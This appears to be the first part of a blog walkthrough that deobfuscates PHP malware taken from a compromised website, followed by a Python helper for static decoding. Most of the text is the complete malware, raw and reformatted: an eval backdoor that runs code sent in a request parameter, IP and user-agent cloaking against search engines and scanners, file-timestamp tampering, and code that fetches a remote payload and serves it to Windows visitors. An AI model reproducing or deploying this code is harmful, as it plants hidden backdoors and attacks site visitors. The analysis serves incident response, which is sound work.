@ignore_user_abort(round(0+0.25+0.25+0.25+0.25));@set_magic_quotes_runtime(round(0));@set_time_limit(round(0));@error_reporting(round(0));if(@function_exists('ini_restore')){@ini_restore(google(0));@ini_restore(google(1));@ini_restore(google(2));@ini_restore(google(3));@ini_restore(google(4));@ini_restore(google(5));}if(@function_exists('ini_set')){@ini_set(google(6),round(0));@ini_set(google(7),round(0));@ini_set(google(8),google(9));@ini_set(google(10),NULL);@ini_set(google(11),round(0));@ini_set(google(12),round(0+0.2+0.2+0.2+0.2+0.2));@ini_set(google(13),round(0+0.25+0.25+0.25+0.25));}elseif(@function_exists('ini_alter')){@ini_alter(google(14),round(0));@ini_alter(google(15),round(0));@ini_alter(google(16),google(17));@ini_alter(google(18),NULL);@ini_alter(google(19),round(0));@ini_alter(google(20),round(0+0.25+0.25+0.25+0.25));@ini_alter(google(21),round(0+0.25+0.25+0.25+0.25));}if(!function_exists('cc')){function 
cc($bot_0){$bot_1=google(22);if(function_exists('curl_init')){$bot_2=curl_init();curl_setopt($bot_2,10002,$bot_0);curl_setopt($bot_2,42,round(0));curl_setopt($bot_2,13,round(0+7.5+7.5+7.5+7.5));curl_setopt($bot_2,19913,round(0+0.25+0.25+0.25+0.25));curl_setopt($bot_2,10018,$bot_1);if(!(@ini_get(google(23))||@ini_get(google(24)))){@curl_setopt($bot_2,52,round(0+1));}@curl_setopt($bot_2,68,round(0+0.4+0.4+0.4+0.4+0.4));$bot_3=curl_exec($bot_2);curl_close($bot_2);if($bot_3 !== false){return $bot_3;}}else if(function_exists('fsockopen')){global $bot_4;$bot_0=str_replace(google(25),google(26),$bot_0);if(preg_match(google(27),"$bot_0")){$bot_5=$bot_0;$bot_0=@explode(google(28),$bot_0);$bot_0=$bot_0[round(0)];$bot_5=str_replace($bot_0,google(29),$bot_5);if(!$bot_5 || $bot_5 == google(30)){$bot_5=google(31);}$bot_6=gethostbyname($bot_0);}else{$bot_6=gethostbyname($bot_0);$bot_5=google(32);}$bot_7=fsockopen($bot_6,round(0+16+16+16+16+16),$bot_8,$bot_9,round(0+2+2+2+2+2));stream_set_timeout($bot_7,round(0+2+2+2+2+2));if($bot_7){$bot_10="GET $bot_5 HTTP/1.0\r\n";$bot_10 .="Host: $bot_0\r\n";$bot_10 .="Referer: http://$bot_0$bot_5\r\n";$bot_10 .= google(33);$bot_10 .="User-Agent: $bot_1\r\n";$bot_10 .= google(34);fputs($bot_7,$bot_10);while(!feof($bot_7)){$bot_11 .= fgets($bot_7,round(0+4096));}fclose($bot_7);$bot_11=@explode(google(35),$bot_11,round(0+2));$bot_12=$bot_11[round(0)];if($bot_4){$bot_12="$bot_4<br /><br />\n$bot_12";}$bot_12=str_replace(google(36),google(37),$bot_12);if($bot_11[round(0+0.2+0.2+0.2+0.2+0.2)]){$bot_13=$bot_11[round(0+1)];}else{$bot_13=google(38);}if($bot_13){$bot_11=$bot_13;}else{$bot_11=$bot_12;}if(preg_match(google(39),"$bot_12")){$bot_0=@explode(google(40),$bot_12);$bot_0=$bot_0[round(0+0.25+0.25+0.25+0.25)];$bot_0=@explode(google(41),$bot_0);$bot_0=$bot_0[round(0)];$bot_4=str_replace(google(42),google(43),$bot_12);$bot_14=google(44);$bot_4=str_replace(google(45),$bot_14,$bot_4);return cc($bot_0);}else{return $bot_11;}}}else{echo 
google(46);exit;}}}if(!function_exists('detB')){function detB($bot_15,$bot_16){$bot_17=array(google(47),google(48),google(49),google(50),google(51),google(52),google(53),google(54),google(55),google(56),google(57),google(58),google(59),google(60),google(61),google(62),google(63),google(64),google(65),google(66),google(67),google(68),google(69),google(70),google(71),google(72),google(73),google(74),google(75),google(76),google(77),google(78),google(79),google(80),google(81),google(82),google(83),google(84),google(85),google(86),google(87),google(88),google(89),google(90),google(91),google(92),google(93),google(94),google(95),google(96),google(97),google(98),google(99),google(100),google(101),google(102),google(103),google(104),google(105),google(106),google(107),google(108),google(109),google(110),google(111),google(112),google(113),google(114),google(115),google(116),google(117),google(118),google(119));$bot_18=array(google(120),google(121),google(122),google(123),google(124),google(125),google(126),google(127),google(128),google(129),google(130),google(131),google(132),google(133),google(134),google(135),google(136),google(137),google(138),google(139),google(140),google(141),google(142),google(143),google(144),google(145),google(146));$bot_15=preg_replace(google(147),google(148),$bot_15);$bot_19=true;foreach($bot_17 as $bot_20)if(eregi("$bot_20",$bot_16)){$bot_19=false;break;}if($bot_19)foreach($bot_18 as $bot_21)if(eregi($bot_21,$bot_15)!== false){$bot_19=false;break;}if($bot_19 and!eregi(google(149),$bot_15)){$bot_19=false;}if($bot_19 and strlen($bot_15)<=round(0+3.66666666667+3.66666666667+3.66666666667)){$bot_19=false;}return $bot_19;}}if(!function_exists('rm_rf')){function rm_rf($bot_22){$bot_23=@filemtime($bot_22);if($bot_24=opendir($bot_22)){while(false !==($bot_25=readdir($bot_24))){if($bot_25 != google(150)&& $bot_25 != google(151)&& 
is_file($bot_25)){@chmod($bot_25,round(0+146+146+146));@unlink($bot_25);}}closedir($bot_24);}@touch($bot_22,$bot_23,$bot_23);}}eval(base64_decode('aWYgKGlzc2V0KCRfUkVRVUVTVFsiZXYxIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImV2MSJdKSk7IGV4aXQ7fQ=='));$bot_26=google(152);$bot_27=$_SERVER[google(153)];$bot_1=$_SERVER[google(154)];$bot_28=$_SERVER[google(155)];if($bot_27 == google(156)|| $bot_1 == google(157)|| $bot_28 == google(158))die();$bot_29=strtolower($bot_1);if(!isset($_COOKIE[$bot_26])&& strstr($bot_29,google(159))!==false){@header(google(160));@header(google(161) .gmdate(google(162)) .google(163));@header(google(164));@header(google(165),false);@header(google(166));$bot_30=dirname($bot_28) .google(167);if(!file_exists($bot_30)){$bot_23=@filemtime(dirname($bot_28));@mkdir($bot_30);@touch(dirname($bot_28),$bot_23,$bot_23);@touch($bot_30,$bot_23,$bot_23);}$bot_31=@date(google(168));if(($bot_31 >= google(169)&& $bot_31 <= google(170))||($bot_31 >= google(171)&& $bot_31 <= google(172)))rm_rf($bot_30);$bot_32=@date(google(173));$bot_33="$bot_30/$bot_32";$bot_34="$bot_30/sess_$bot_32";if(!file_exists($bot_33)){$bot_23=@filemtime($bot_30);$bot_35=fopen($bot_33,google(174));fclose($bot_35);@touch($bot_30,$bot_23,$bot_23);}if(!file_exists($bot_34)|| filesize($bot_34)<round(0+5)){$bot_36=array(google(175),google(176),google(177),google(178));$bot_37=$bot_36[rand(round(0),round(0+0.2+0.2+0.2+0.2+0.2))] .$bot_36[round(0+3)] .$bot_36[round(0+1+1)];$bot_38=@cc($bot_37);if($bot_38 != google(179)){$bot_23=@filemtime($bot_30);$bot_35=@fopen($bot_34,google(180));@fwrite($bot_35,"$bot_38");@fclose($bot_35);@touch($bot_30,$bot_23,$bot_23);@touch($bot_34,$bot_23,$bot_23);}}$bot_39=@base64_decode(@file_get_contents($bot_34));$bot_40=@file($bot_33);$bot_41=false;foreach($bot_40 as $bot_42){if(@trim($bot_42)== $bot_27){$bot_41=true;break;}}$bot_19=@detB($bot_1,$bot_27);if($bot_41 == false && $bot_19 == 
true){$bot_35=@fopen($bot_33,google(181));@fwrite($bot_35,"$bot_27\n");@fclose($bot_35);echo $bot_39;}} ?>

As you can see, it is just more meaningless code, but now we have PHP code to process and analyse, even if it is obfuscated to a degree. It is still incomprehensible, but little by little we will "deobfuscate" this code to make it more readable and understand what it does.

The first step is to try to beautify the text by adding line breaks and indentation, so we will use a tool called PHP Formatter for exactly that, available at http://beta.phpformatter.com/. After running the formatter, the result is as follows:

<?php
if (!function_exists('google')) {
    function google($i)
    {
        $a = Array(
            "safe_mode",
            "open_basedir",
            "safe_mode_include_dir",
            "safe_mode_exec_dir",
            "disable_functions",
            "allow_url_fopen",
            'max_execution_time',
            'output_buffering',
            'memory_limit',
            '16M',
            'error_log',
            'log_errors',
            'file_uploads',
            'allow_url_fopen',
            'max_execution_time',
            'output_buffering',
            'memory_limit',
            '16M',
            'error_log',
            'log_errors',
            'file_uploads',
            'allow_url_fopen',
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",
            'safe_mode',
            'open_basedir',
            "http://",
            "",
            "#/#",
            "/",
            "",
            "",
            "/",
            "/",
            "Accept-Language: en-us, en;q=0.50\r\n",
            "Connection: Close\r\n\r\n",
            "\r\n\r\n",
            "\n",
            "<br />",
            "",
            "/Location\:/",
            "Location: ",
            "\r",
            "\r\n\r\n",
            "",
            "&#76&#111&#99&#97&#116&#105&#111&#110&#58",
            "Location:",
            "ERROR",
            "66\.249\.[6-9][0-9]\.[0-9]+",
            "72\.14\.[1-2][0-9][0-9]\.[0-9]+",
            "74\.125\.[0-9]+\.[0-9]+",
            "65\.5[2-5]\.[0-9]+\.[0-9]+",
            "74\.6\.[0-9]+\.[0-9]+",
            "67\.195\.[0-9]+\.[0-9]+",
            "72\.30\.[0-9]+\.[0-9]+",
            "38\.[0-9]+\.[0-9]+\.[0-9]+",
            "124\.115\.6\.[0-9]+",
            "93\.172\.94\.227",
            "212\.100\.250\.218",
            "71\.165\.223\.134",
            "209\.9\.239\.101",
            "67\.217\.160\.[0-9]+",
            "70\.91\.180\.25",
            "65\.93\.62\.242",
            "74\.193\.246\.129",
            "213\.144\.15\.38",
            "195\.92\.229\.2",
            "70\.50\.189\.191",
            "218\.28\.88\.99",
            "165\.160\.2\.20",
            "89\.122\.224\.230",
            "66\.230\.175\.124",
            "218\.18\.174\.27",
            "65\.33\.87\.94",
            "67\.210\.111\.241",
            "81\.135\.175\.70",
            "64\.69\.34\.134",
            "89\.149\.253\.169",
            "64\.233\.1[6-8][1-9]\.[0-9]+",
            "64\.233\.19[0-1]\.[0-9]+",
            "209\.185\.108\.[0-9]+",
            "209\.185\.253\.[0-9]+",
            "209\.85\.238\.[0-9]+",
            "216\.239\.33\.9[6-9]",
            "216\.239\.37\.9[8-9]",
            "216\.239\.39\.9[8-9]",
            "216\.239\.41\.9[6-9]",
            "216\.239\.45\.4",
            "216\.239\.46\.[0-9]+",
            "216\.239\.51\.9[6-9]",
            "216\.239\.53\.9[8-9]",
            "216\.239\.57\.9[6-9]",
            "216\.239\.59\.9[8-9]",
            "216\.33\.229\.163",
            "64\.233\.173\.[0-9]+",
            "64\.68\.8[0-9]\.[0-9]+",
            "64\.68\.9[0-2]\.[0-9]+",
            "72\.14\.199\.[0-9]+",
            "8\.6\.48\.[0-9]+",
            "207\.211\.40\.82",
            "67\.162\.158\.146",
            "66\.255\.53\.123",
            "24\.200\.208\.112",
            "129\.187\.148\.240",
            "129\.187\.148\.244",
            "199\.126\.151\.229",
            "118\.124\.32\.193",
            "89\.149\.217\.191",
            "122\.164\.27\.42",
            "149\.5\.168\.2",
            "150\.70\.66\.[0-9]+",
            "194\.250\.116\.39",
            "208\.80\.194\.[0-9]+",
            "62\.190\.39\.205",
            "67\.198\.80\.236",
            "85\.85\.187\.243",
            "95\.134\.141\.250",
            "97\.107\.135\.[0-9]+",
            "184\.168\.191\.[0-9]+",
            "95\.108\.157\.[0-9]+",
            "209\.235\.253\.17",
            'http',
            'google',
            'slurp',
            'msnbot',
            'bot',
            'crawl',
            'spider',
            'robot',
            'httpclient',
            'curl',
            'php',
            'indy library',
            'wordpress',
            'charlotte',
            'wwwster',
            'python',
            'urllib',
            'perl',
            'libwww',
            'lynx',
            'twiceler',
            'rambler',
            'yandex',
            'trend',
            'virus',
            'malware',
            'wget',
            "|User\.Agent\:[\s ]?|i",
            "",
            "^[a-zA-Z]{5,}",
            ".",
            "..",
            'langs',
            'REMOTE_ADDR',
            'HTTP_USER_AGENT',
            'SCRIPT_FILENAME',
            '',
            '',
            '',
            'windows',
            'Expires: Sat, 26 Jul 1997 05:00:00 GMT',
            'Last-Modified: ',
            'D, d M Y H:i:s',
            ' GMT',
            'Cache-Control: no-store, no-cache, must-revalidate',
            'Cache-Control: post-check=0, pre-check=0',
            'Pragma: no-cache',
            '/.svn',
            "Hi",
            '0000',
            '0001',
            '1200',
            '1201',
            "ymd",
            "w",
            'ohix.',
            'effbot.',
            '/f/',
            'net',
            'ERROR',
            "w",
            "a"
        );
        return $a[$i];
    }
}
?><?php
@ignore_user_abort(round(0 + 0.25 + 0.25 + 0.25 + 0.25));
@set_magic_quotes_runtime(round(0));
@set_time_limit(round(0));
@error_reporting(round(0));
if (@function_exists('ini_restore')) {
    @ini_restore(google(0));
    @ini_restore(google(1));
    @ini_restore(google(2));
    @ini_restore(google(3));
    @ini_restore(google(4));
    @ini_restore(google(5));
}
if (@function_exists('ini_set')) {
    @ini_set(google(6), round(0));
    @ini_set(google(7), round(0));
    @ini_set(google(8), google(9));
    @ini_set(google(10), NULL);
    @ini_set(google(11), round(0));
    @ini_set(google(12), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
    @ini_set(google(13), round(0 + 0.25 + 0.25 + 0.25 + 0.25));
} elseif (@function_exists('ini_alter')) {
    @ini_alter(google(14), round(0));
    @ini_alter(google(15), round(0));
    @ini_alter(google(16), google(17));
    @ini_alter(google(18), NULL);
    @ini_alter(google(19), round(0));
    @ini_alter(google(20), round(0 + 0.25 + 0.25 + 0.25 + 0.25));
    @ini_alter(google(21), round(0 + 0.25 + 0.25 + 0.25 + 0.25));
}
if (!function_exists('cc')) {
    function cc($bot_0)
    {
        $bot_1 = google(22);
        if (function_exists('curl_init')) {
            $bot_2 = curl_init();
            curl_setopt($bot_2, 10002, $bot_0);
            curl_setopt($bot_2, 42, round(0));
            curl_setopt($bot_2, 13, round(0 + 7.5 + 7.5 + 7.5 + 7.5));
            curl_setopt($bot_2, 19913, round(0 + 0.25 + 0.25 + 0.25 + 0.25));
            curl_setopt($bot_2, 10018, $bot_1);
            if (!(@ini_get(google(23)) || @ini_get(google(24)))) {
                @curl_setopt($bot_2, 52, round(0 + 1));
            }
            @curl_setopt($bot_2, 68, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4));
            $bot_3 = curl_exec($bot_2);
            curl_close($bot_2);
            if ($bot_3 !== false) {
                return $bot_3;
            }
        } else if (function_exists('fsockopen')) {
            global $bot_4;
            $bot_0 = str_replace(google(25), google(26), $bot_0);
            if (preg_match(google(27), "$bot_0")) {
                $bot_5 = $bot_0;
                $bot_0 = @explode(google(28), $bot_0);
                $bot_0 = $bot_0[round(0)];
                $bot_5 = str_replace($bot_0, google(29), $bot_5);
                if (!$bot_5 || $bot_5 == google(30)) {
                    $bot_5 = google(31);
                }
                $bot_6 = gethostbyname($bot_0);
            } else {
                $bot_6 = gethostbyname($bot_0);
                $bot_5 = google(32);
            }
            $bot_7 = fsockopen($bot_6, round(0 + 16 + 16 + 16 + 16 + 16), $bot_8, $bot_9, round(0 + 2 + 2 + 2 + 2 + 2));
            stream_set_timeout($bot_7, round(0 + 2 + 2 + 2 + 2 + 2));
            if ($bot_7) {
                $bot_10 = "GET $bot_5 HTTP/1.0\r\n";
                $bot_10 .= "Host: $bot_0\r\n";
                $bot_10 .= "Referer: http://$bot_0$bot_5\r\n";
                $bot_10 .= google(33);
                $bot_10 .= "User-Agent: $bot_1\r\n";
                $bot_10 .= google(34);
                fputs($bot_7, $bot_10);
                while (!feof($bot_7)) {
                    $bot_11 .= fgets($bot_7, round(0 + 4096));
                }
                fclose($bot_7);
                $bot_11 = @explode(google(35), $bot_11, round(0 + 2));
                $bot_12 = $bot_11[round(0)];
                if ($bot_4) {
                    $bot_12 = "$bot_4<br /><br />\n$bot_12";
                }
                $bot_12 = str_replace(google(36), google(37), $bot_12);
                if ($bot_11[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)]) {
                    $bot_13 = $bot_11[round(0 + 1)];
                } else {
                    $bot_13 = google(38);
                }
                if ($bot_13) {
                    $bot_11 = $bot_13;
                } else {
                    $bot_11 = $bot_12;
                }
                if (preg_match(google(39), "$bot_12")) {
                    $bot_0  = @explode(google(40), $bot_12);
                    $bot_0  = $bot_0[round(0 + 0.25 + 0.25 + 0.25 + 0.25)];
                    $bot_0  = @explode(google(41), $bot_0);
                    $bot_0  = $bot_0[round(0)];
                    $bot_4  = str_replace(google(42), google(43), $bot_12);
                    $bot_14 = google(44);
                    $bot_4  = str_replace(google(45), $bot_14, $bot_4);
                    return cc($bot_0);
                } else {
                    return $bot_11;
                }
            }
        } else {
            echo google(46);
            exit;
        }
    }
}
if (!function_exists('detB')) {
    function detB($bot_15, $bot_16)
    {
        $bot_17 = array(
            google(47),
            google(48),
            google(49),
            google(50),
            google(51),
            google(52),
            google(53),
            google(54),
            google(55),
            google(56),
            google(57),
            google(58),
            google(59),
            google(60),
            google(61),
            google(62),
            google(63),
            google(64),
            google(65),
            google(66),
            google(67),
            google(68),
            google(69),
            google(70),
            google(71),
            google(72),
            google(73),
            google(74),
            google(75),
            google(76),
            google(77),
            google(78),
            google(79),
            google(80),
            google(81),
            google(82),
            google(83),
            google(84),
            google(85),
            google(86),
            google(87),
            google(88),
            google(89),
            google(90),
            google(91),
            google(92),
            google(93),
            google(94),
            google(95),
            google(96),
            google(97),
            google(98),
            google(99),
            google(100),
            google(101),
            google(102),
            google(103),
            google(104),
            google(105),
            google(106),
            google(107),
            google(108),
            google(109),
            google(110),
            google(111),
            google(112),
            google(113),
            google(114),
            google(115),
            google(116),
            google(117),
            google(118),
            google(119)
        );
        $bot_18 = array(
            google(120),
            google(121),
            google(122),
            google(123),
            google(124),
            google(125),
            google(126),
            google(127),
            google(128),
            google(129),
            google(130),
            google(131),
            google(132),
            google(133),
            google(134),
            google(135),
            google(136),
            google(137),
            google(138),
            google(139),
            google(140),
            google(141),
            google(142),
            google(143),
            google(144),
            google(145),
            google(146)
        );
        $bot_15 = preg_replace(google(147), google(148), $bot_15);
        $bot_19 = true;
        foreach ($bot_17 as $bot_20)
            if (eregi("$bot_20", $bot_16)) {
                $bot_19 = false;
                break;
            }
        if ($bot_19)
            foreach ($bot_18 as $bot_21)
                if (eregi($bot_21, $bot_15) !== false) {
                    $bot_19 = false;
                    break;
                }
        if ($bot_19 and !eregi(google(149), $bot_15)) {
            $bot_19 = false;
        }
        if ($bot_19 and strlen($bot_15) <= round(0 + 3.66666666667 + 3.66666666667 + 3.66666666667)) {
            $bot_19 = false;
        }
        return $bot_19;
    }
}
if (!function_exists('rm_rf')) {
    function rm_rf($bot_22)
    {
        $bot_23 = @filemtime($bot_22);
        if ($bot_24 = opendir($bot_22)) {
            while (false !== ($bot_25 = readdir($bot_24))) {
                if ($bot_25 != google(150) && $bot_25 != google(151) && is_file($bot_25)) {
                    @chmod($bot_25, round(0 + 146 + 146 + 146));
                    @unlink($bot_25);
                }
            }
            closedir($bot_24);
        }
        @touch($bot_22, $bot_23, $bot_23);
    }
}
eval(base64_decode('aWYgKGlzc2V0KCRfUkVRVUVTVFsiZXYxIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImV2MSJdKSk7IGV4aXQ7fQ=='));
$bot_26 = google(152);
$bot_27 = $_SERVER[google(153)];
$bot_1  = $_SERVER[google(154)];
$bot_28 = $_SERVER[google(155)];
if ($bot_27 == google(156) || $bot_1 == google(157) || $bot_28 == google(158))
    die();
$bot_29 = strtolower($bot_1);
if (!isset($_COOKIE[$bot_26]) && strstr($bot_29, google(159)) !== false) {
    @header(google(160));
    @header(google(161) . gmdate(google(162)) . google(163));
    @header(google(164));
    @header(google(165), false);
    @header(google(166));
    $bot_30 = dirname($bot_28) . google(167);
    if (!file_exists($bot_30)) {
        $bot_23 = @filemtime(dirname($bot_28));
        @mkdir($bot_30);
        @touch(dirname($bot_28), $bot_23, $bot_23);
        @touch($bot_30, $bot_23, $bot_23);
    }
    $bot_31 = @date(google(168));
    if (($bot_31 >= google(169) && $bot_31 <= google(170)) || ($bot_31 >= google(171) && $bot_31 <= google(172)))
        rm_rf($bot_30);
    $bot_32 = @date(google(173));
    $bot_33 = "$bot_30/$bot_32";
    $bot_34 = "$bot_30/sess_$bot_32";
    if (!file_exists($bot_33)) {
        $bot_23 = @filemtime($bot_30);
        $bot_35 = fopen($bot_33, google(174));
        fclose($bot_35);
        @touch($bot_30, $bot_23, $bot_23);
    }
    if (!file_exists($bot_34) || filesize($bot_34) < round(0 + 5)) {
        $bot_36 = array(
            google(175),
            google(176),
            google(177),
            google(178)
        );
        $bot_37 = $bot_36[rand(round(0), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))] . $bot_36[round(0 + 3)] . $bot_36[round(0 + 1 + 1)];
        $bot_38 = @cc($bot_37);
        if ($bot_38 != google(179)) {
            $bot_23 = @filemtime($bot_30);
            $bot_35 = @fopen($bot_34, google(180));
            @fwrite($bot_35, "$bot_38");
            @fclose($bot_35);
            @touch($bot_30, $bot_23, $bot_23);
            @touch($bot_34, $bot_23, $bot_23);
        }
    }
    $bot_39 = @base64_decode(@file_get_contents($bot_34));
    $bot_40 = @file($bot_33);
    $bot_41 = false;
    foreach ($bot_40 as $bot_42) {
        if (@trim($bot_42) == $bot_27) {
            $bot_41 = true;
            break;
        }
    }
    $bot_19 = @detB($bot_1, $bot_27);
    if ($bot_41 == false && $bot_19 == true) {
        $bot_35 = @fopen($bot_33, google(181));
        @fwrite($bot_35, "$bot_27\n");
        @fclose($bot_35);
        echo $bot_39;
    }
}
?>

Much better, isn't it? For now we'll leave it here. In the second part I'll explain how I carried out the rest of the code's “deobfuscation” and try to explain what it does, how it attacked the site's visitors, how it got in and how it was cleaned up.

If anyone wants to spend some time and try it on their own, post your results in the comments and we'll compare notes in the second part.
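As an added example of the mechanical part of that deobfuscation (this is not the author's tooling, just a helper written for this page), the following Python script folds the `round(0 + x + x + ...)` constants into the integers PHP computes, inlines `google(N)` calls from the string table, and statically decodes the `eval(base64_decode('...'))` wrapper without executing anything. The table it carries is a partial copy of the page's own lookup table (visible tail: index 124 = `'bot'` through 181 = `'a'`), and the sample lines are copied from the listing above.

```python
import base64
import math
import re

# Partial copy of the page's google() string table (visible tail: index 124 = 'bot'
# ... 181 = 'a'); only the indices used by the sample lines are kept, so any
# index not listed is left untouched in the output.
STRING_TABLE = {
    149: "^[a-zA-Z]{5,}", 152: "langs", 153: "REMOTE_ADDR",
    154: "HTTP_USER_AGENT", 155: "SCRIPT_FILENAME", 159: "windows",
    167: "/.svn", 168: "Hi", 169: "0000", 170: "0001", 171: "1200",
    172: "1201", 173: "ymd", 180: "w", 181: "a",
}

def fold_round(src):
    """Collapse round(0 + x + x + ...) into the integer PHP would compute."""
    def repl(m):
        total = sum(float(t) for t in m.group(1).split("+"))
        return str(int(math.floor(total + 0.5)))  # PHP rounds half away from zero
    return re.sub(r"round\(([\d.+\s]+)\)", repl, src)

def inline_strings(src, table=STRING_TABLE):
    """Replace google(N) with a single-quoted PHP literal from the table."""
    def repl(m):
        idx = int(m.group(1))
        if idx not in table:
            return m.group(0)  # unknown index: leave the call as-is
        lit = table[idx].replace("\\", "\\\\").replace("'", "\\'")
        return "'" + lit + "'"
    return re.sub(r"google\((\d+)\)", repl, src)

def decode_eval_b64(src):
    """Statically decode eval(base64_decode('...')) wrappers; nothing is executed."""
    def repl(m):
        inner = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        return "/* decoded: */ " + inner
    return re.sub(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)", repl, src)

def deobfuscate(src):
    return decode_eval_b64(inline_strings(fold_round(src)))

# Sample input: four lines copied from the listing above.
SAMPLE = """$bot_27 = $_SERVER[google(153)];
if ($bot_19 and strlen($bot_15) <= round(0 + 3.66666666667 + 3.66666666667 + 3.66666666667)) {
@chmod($bot_25, round(0 + 146 + 146 + 146));
eval(base64_decode('aWYgKGlzc2V0KCRfUkVRVUVTVFsiZXYxIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImV2MSJdKSk7IGV4aXQ7fQ=='));"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run over the full listing it turns, for instance, the `chmod` argument into 438 (0666 in octal) and the user-agent length check into `<= 11`; the decoded wrapper shows the request parameter an incident responder would search the site's access logs for.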